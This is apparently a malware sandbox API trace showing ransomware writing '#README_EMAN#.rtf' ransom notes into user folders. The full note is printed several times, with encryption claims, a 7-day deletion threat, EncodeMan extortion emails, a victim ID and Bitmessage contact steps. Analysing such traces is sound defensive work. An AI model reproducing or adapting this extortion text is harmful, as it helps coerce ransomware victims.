\\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x83\x19", lpUsedDefaultChar=0x0) returned 8717 [0289.338] WriteFile (in: hFile=0x2e8, lpBuffer=0x2373dc8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2373dc8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.339] CloseHandle (hObject=0x2e8) returned 1 [0289.339] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0289.339] GetLastError () returned 0x2 [0289.339] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.339] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.339] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.339] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2373dc8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your 